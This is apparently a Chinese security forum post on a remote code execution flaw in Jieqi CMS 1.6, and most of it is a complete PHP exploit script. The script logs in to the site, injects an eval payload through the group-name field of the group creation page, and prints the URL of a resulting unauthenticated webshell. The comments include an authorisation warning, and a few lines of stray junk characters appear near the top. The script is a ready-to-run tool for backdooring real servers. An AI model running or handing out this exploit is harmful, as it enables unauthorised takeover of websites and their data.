杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
$ k* C* p( M, p7 X7 Z9 s2 w- {. M7 X7 m& O
; @" d) K* u& [% `# w7 v: B; a
该系统存在多个远程安全漏洞,今天报告的这个是 1.6 版本的一个远程代码执行漏洞,应该有 2 年多历史了。从下面的利用代码看,注入点是 modules/group/create.php 的圈子名称(gname)字段:利用代码假定该值会被原样写入 files/group/userdir/0/<圈子ID>/info.php 中的单引号字符串,因此闭合引号后即可执行任意 PHP 代码。
利用前提:需要有一个能创建圈子的用户账号(用户名和密码均作为参数传入)。
" l: e# P: i) `7 }+ J
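<?php
/**
 * Jieqi CMS V1.6 PHP code injection exploit (original by flyh4t).
 *
 * What the script does, as implemented below:
 *   1. POST the supplied credentials to <path>/login.php and keep the
 *      session cookies in a cookie-jar file.
 *   2. POST a multipart form to <path>/modules/group/create.php whose
 *      `gname` field is `';eval($_POST[p]);//flyh4t`. The exploit relies on
 *      the CMS writing that value into a PHP file as an unescaped
 *      single-quoted string literal (inferred from the payload shape; the
 *      vulnerable server-side code is not part of this page).
 *   3. Take the new group id from the first `g=<digits>` in the response and
 *      print the URL of the resulting backdoor:
 *      <path>/files/group/userdir/0/<gid>/info.php
 *
 * Usage: php <script> host path username password
 *   host      target server (ip/hostname), no scheme
 *   path      web path of the Jieqi CMS install, e.g. /jieqicmsv1.6/
 *   username  an account that is allowed to create a group
 *   password  that account's password
 *
 * WARNING: run this only against systems you are authorised to test. On
 * success it leaves a persistent, UNAUTHENTICATED webshell on the target —
 * "password:p" only means the code is taken from the POST parameter named
 * `p`; anyone who knows the URL can use it. Remove the created group and
 * info.php after testing. The login session is also written to ./cookie.txt
 * in the current directory.
 *
 * Original author's note: "works regardless of php.ini settings" (not
 * re-verified here).
 */

print_r('
+---------------------------------------------------------------------------+
Jieqi CMS V1.6 PHP Code Injection Exploit
by flyh4t
mail: phpsec at hotmail dot com
team: http://www.wolvez.org
+---------------------------------------------------------------------------+
');

// Four arguments are required; the original usage text listed only three.
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php ' . $argv[0] . ' host path username password
host: target server (ip/hostname)
path: path to jieqicms
username: a username who can create group
password: password of that user
Example:
php ' . $argv[0] . ' localhost /jieqicmsv1.6/ vipuser1 password
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(E_ERROR | E_WARNING | E_PARSE); // same mask as the original error_reporting(7)
ini_set('max_execution_time', 0);

$host     = $argv[1];
$path     = $argv[2];
$username = $argv[3];
$password = $argv[4];

// Base URL of the install, always ending in '/'; tolerates a path given with
// or without surrounding slashes (the original produced "host//path//file").
$base = 'http://' . $host . '/' . trim($path, '/');
if (substr($base, -1) !== '/') {
    $base .= '/';
}

/**
 * Log in to the CMS and store the session cookies in $cookie_jar.
 *
 * Returns true when the HTTP exchange completed, false when cURL failed.
 * A completed exchange does not prove the credentials were accepted: there
 * is no known success marker for login.php here, so a wrong password only
 * shows up later, when group creation yields no `g=` id.
 */
function jieqi_login($base, $username, $password, $cookie_jar)
{
    // Field order and the pre-encoded submit value (GBK bytes of the login
    // button label) are kept from the original request. Only the
    // user-supplied values are URL-encoded, so a password containing
    // '&', '%' or '+' no longer corrupts the query string.
    $body = 'password=' . urlencode($password)
          . '&username=' . urlencode($username)
          . '&usecookie=86400'
          . '&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B'
          . '&action=login&jumpreferer=1';

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $base . 'login.php');
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_jar);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // capture the body instead of ob_start()/ob_clean()
    $response = curl_exec($ch);
    if ($response === false) {
        // The original reported curl_error($ch) on a handle that was never
        // defined, so this message was always empty.
        echo 'cURL Error: ' . curl_error($ch) . "\n";
        curl_close($ch);
        return false;
    }
    curl_close($ch);
    return true;
}

/**
 * Build a multipart/form-data body for $fields (name => value).
 *
 * CRLF line endings are used as multipart requires; the original embedded the
 * body in a string literal and therefore depended on the source file's own
 * line endings.
 */
function build_multipart($boundary, array $fields)
{
    $body = '';
    foreach ($fields as $name => $value) {
        $body .= '--' . $boundary . "\r\n"
               . 'Content-Disposition: form-data; name="' . $name . '"' . "\r\n"
               . "\r\n"
               . $value . "\r\n";
    }
    return $body . '--' . $boundary . "--\r\n";
}

/**
 * Create a group whose name is $gname (the payload) using the saved session.
 *
 * Returns the raw response body, or false if cURL failed. gcatid/gaudit/gbrief
 * are fixed to "1" exactly as in the original request.
 */
function jieqi_create_group($base, $cookie_jar, $gname)
{
    $boundary = str_repeat('-', 27) . '23281168279961'; // same boundary as the original
    $body = build_multipart($boundary, array(
        'gname'  => $gname,
        'gcatid' => '1',
        'gaudit' => '1',
        'gbrief' => '1',
    ));

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $base . 'modules/group/create.php');
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'Content-Type: multipart/form-data; boundary=' . $boundary,
    ));
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_jar);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $response = curl_exec($ch);
    if ($response === false) {
        echo 'cURL Error: ' . curl_error($ch) . "\n";
    }
    curl_close($ch);
    return $response;
}

/* get cookie */
$cookie_jar = 'cookie.txt';
if (!jieqi_login($base, $username, $password, $cookie_jar)) {
    exit('exploit failed');
}

/* get shell */
// Payload: closes the single-quoted string the group name is (presumably)
// written into, evaluates POST parameter `p`, and comments out the rest of
// the line. Reproduced byte-for-byte from the original.
$payload = '\';eval($_POST[p]);//flyh4t';
$resp = jieqi_create_group($base, $cookie_jar, $payload);
if ($resp === false) {
    exit('exploit failed');
}

// The new group's id is the first `g=<digits>` in the response. The original
// capped the capture at four digits, which would silently truncate larger ids.
if (!preg_match('/g=([0-9]+)/', $resp, $match)) {
    echo "group id not found in response - login may have failed or the target is not vulnerable\r\n";
    exit('exploit failed');
}
$gid = $match[1];

echo "view your shell here(password:p)\r\n";
echo $base . 'files/group/userdir/0/' . $gid . '/info.php';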